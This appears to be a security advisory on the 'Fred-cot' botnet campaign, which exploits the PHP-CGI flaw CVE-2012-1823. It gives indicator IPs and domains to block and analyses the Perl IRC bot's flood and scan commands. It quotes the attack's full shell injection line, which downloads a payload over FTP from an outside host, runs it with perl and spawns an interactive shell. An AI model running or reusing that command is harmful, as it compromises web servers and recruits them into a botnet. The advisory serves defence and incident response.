As a new addition to our securityintelligence.com site we will begin to more regularly feature threat analysis from IBM’s Managed Security Services organization. This team operates a 24/7 Security Operations Center (SOC) on behalf of thousands of clients globally.
“Fred-Cot” overview
On Saturday, November 2, the IBM SOC detected an active attack attempting to infect several webservers to become part of a botnet. IBM has identified this attack with the name “Fred-cot.” “Fred-cot” was part of the FTP URL where the malware repository was located as well as part of the user name / password required to access the site. The attack, which was active over the weekend but began to taper off earlier this week, is attempting to exploit an older vulnerability in PHP. It works by attempting to connect to port 80 (web) on a targeted IP and injecting a shell command, which if successful, allows the malware to infect the victim’s system.
Details of the attack
The original attack appeared to originate from the IP address 72.26.194.138. This attack was first spotted by our threat analysts at 7am Eastern on Saturday, November 2nd. IBM is identifying this attack as “Fred-cot.” This address appears to be crawling IP address ranges attempting to connect to port 80 (web) on the targeted IP. Once a connection has been made, the attacking system attempts to inject a shell command. If this command is successfully run on the victim’s system, this malware would connect to 31.204.152.37 via FTP to download gj.exe. Once gj.exe had been downloaded and executed, the victim’s system will be connected to an IRC channel and will wait for further commands.
Site names mail.sermonshare.com, mail.radioworship.net, web1.sermon.net, and web02.sermmonshare.com all resolve to the 72.26.194.138 address. Activity to and from these site names should be considered suspicious at this time. Site names mijn-site.be, jinraforest.be, faker.eu, euroveiling.com, busimatch.com and six other hosts resolve to 31.204.152.37. Any activity to or from these sites should be considered especially suspicious. This IP is the repository for the malicious code.
We have seen the following shell injection code being used in this attack:
unset HISTFILE; unset HISTSIZE; uname -a; cd /tmp;wget ftp[COLON]//fredcot[COLON]fredcot123[AT]31.204.152.37/gj.exe;perl gj.exe;rm -rf gj.exe;w; id; /bin/sh -i’;x0a$daemo
83.170.75.200 appears to be the IP address of the IRC server the malware payload is using as a command and control (C&C) server.
We strongly recommend applying firewall rules to block any access to or from the 72.26.194.138, 31.204.152.37, and 83.170.75.200 addresses. Security teams should be aware that IP addresses specified could potentially change. Some anti-virus vendors can detect this malware and it is advisable to verify your software and definition files are up to date.
Malware analysis
This attack appears to be targeting an old vulnerability, CVE-2012-1823, in various versions of PHP paired with Apache web servers. This vulnerability was patched in 5.4.3 and 5.3.13 last year and we covered it in a number of assessments in the months of May and June. This vulnerability deals with an obscure portion of the CGI specification. Other web servers do not adhere to these specifications as Apache does.
The payload of the attack, gj.exe, contrary to implications the name implies, is not a Microsoft executable, it is a Perl script. There were four different variations of the script on the compromised site located at 31.204.152.37 that contained slight differences with the IRC server, ports used, IRC admins, and channels. There were also a number of files containing IP addresses, although their exact use is not known. Other tools located in the directory structure may have been used to generate the list of targets or possibly used in another form of attack.
Once infected and executing the malware, the victim’s system would become just another bot in the botnet. Based on the code, it appears the malware attempts to avoid detection by hiding itself as just another /usr/sbin/sshd process on the system. Connecting back to an IRC server, the victim would wait for commands sent to it through a private message. These commands could include
- tcpflood used to send packets to a specific host / port combination for a specified time to generate a denial of service condition
- udpflood used to send packets to a specific host with a designated packet size for a specified time to generate a denial of service condition
- httpflood used to retrieve the index page of a specific host for a specified time to generate a denial of service condition
- portscan used to scan a specified list of ports, including 21, 22, 25, and 80, as well as others
- google used to search Google for references to sites with modules.php installed, possibly used to determine additional vulnerable sites
- Also included in the code were a number of routines specific to IRC commands, such as connecting to a server, registering with a random nick (vn#### was the pattern used), joining channels, and exiting the IRC server. A subroutine in the malware might have been intended to allow the attacker to execute a remote command on the infected system.
Take action
We strongly suggest that our readers take the time to verify their PHP installations are current and are patched against this old vulnerability. This attack seems to indicate there may be systems facing the Internet that are not. As mentioned before, some anti-virus products do detect this malware. Users should ensure their anti-virus software and associated definition files are up to date. It is also advisable to block traffic to and from the hosts listed below at the perimeter firewalls. Please note, these are the IP addresses we have detected in this wave of attacks and could potentially change in the future. Administrators should monitor their logs for any suspicious activity.
Current list of hosts that should be blocked due to malicious activity:
- IPv4: 72.26.194.138 – Original attack vector
- IPv4: 85.214.35.154 – Reverse shell destination
- IPv4: 31.204.152.37 – FTP malware repository
- IPv4: 83.170.75.200 – IRC server used for CnC
- IPv4: 78.109.84.137 – IRC server used for CnC
- IPv4: 50.57.71.234 – Additional attack vector
- URI: army1.megaforce.co.il – IRC server used for CnC
- URI: army2.megaforce.co.il – IRC server used for CnC
- URI: army3.megaforce.co.il – IRC server used for CnC
- URI: army4.megaforce.co.il – IRC server used for CnC
- URI: army5.megaforce.co.il – IRC server used for CnC
- URI: army6.megaforce.co.il – IRC server used for CnC
- URI: army7.megaforce.co.il – IRC server used for CnC
- URI: army8.megaforce.co.il – IRC server used for CnC
- URI: army9.megaforce.co.il – IRC server used for CnC
Cyber Threat and Intelligence Analyst, IBM X-Force